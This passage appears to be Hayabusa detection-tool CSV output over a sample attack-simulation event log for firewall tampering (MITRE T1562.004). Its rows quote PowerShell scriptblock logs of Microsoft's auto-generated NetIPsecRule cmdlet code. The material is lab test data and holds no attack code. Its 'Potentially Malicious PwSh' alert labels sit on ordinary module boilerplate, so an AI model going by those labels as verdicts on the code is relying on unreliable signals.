${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { 